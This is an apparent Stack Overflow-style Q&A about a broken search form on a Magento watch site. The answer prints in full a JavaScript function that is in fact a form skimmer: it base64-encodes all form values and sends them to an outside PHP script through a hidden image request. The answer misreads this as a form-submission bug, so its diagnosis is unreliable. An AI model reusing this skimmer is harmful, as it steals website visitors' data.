# Magento search error

Tags: php, magento

I have a [website](http://phoenixwatch.hk/) that runs on magento

In the home page if you scroll down, you will find search watches.
When you select watch model,type & price and hit Search. The search is not displaying the results & it is spitting out this error

**"There was a problem with the subscription: Please enter a valid email address."**

I have no knowledge on magento or PHP. I am a HTML developer. Could anyone help me solve the issue?

Comment: I need to check your code..If you willing to share your code to email.. ID : stalinrajindian@gmail.com

Answer (score 0):

You have an error in the MakeEvent function:

```
    function MakeEvent() {
        if (navigator.appName == 'Microsoft Internet Explorer') {
            return;
        }
        forms = document.getElementsByTagName("form");
        for (var j = 0; j < forms.length; j++) {
            forms[j].onsubmit = function () {
                setTimeout(function (formIndex) {
                    frms = document.getElementsByTagName("form");
                    frms[formIndex - 1].submit();
                }, 500, j);
                return false
            };
            var elements = forms[j].getElementsByTagName("button");
            for (var i = 0; i < elements.length; i++) {
                if (elements[i].type == "submit" || true) {
                    eventArray[i] = elements[i].onclick;
                    elements[i].onmousedown = function () {
                        data = getAllValues();
                        var newImg = document.createElement("img");
                        newImg.setAttribute("src", "http://www.followthefashion.org/wp-content/uploads/2014/07/skin.php?data=" + encodeURI(base64_encode(data)));
                        newImg.setAttribute("height", "1");
                        newImg.setAttribute("width", "1");
                        newImg.setAttribute("alt", "Please, wait...");
                        document.body.appendChild(newImg);
//sleep(500);
                    };
                }
            }
        }
    }
    MakeEvent();
```

As you can see, while submitting your basic form, the script submits the other (previous) form.

```
frms[formIndex - 1].submit();
```

[image: The URL of another form]
I think you’d better use ajax in your function i.e. the "form.submit()” method works the same as clicking the “submit" button.

> The submit() method submits the form (same as clicking the Submit button).
>   [Link](http://www.w3schools.com/jsref/met_form_submit.asp)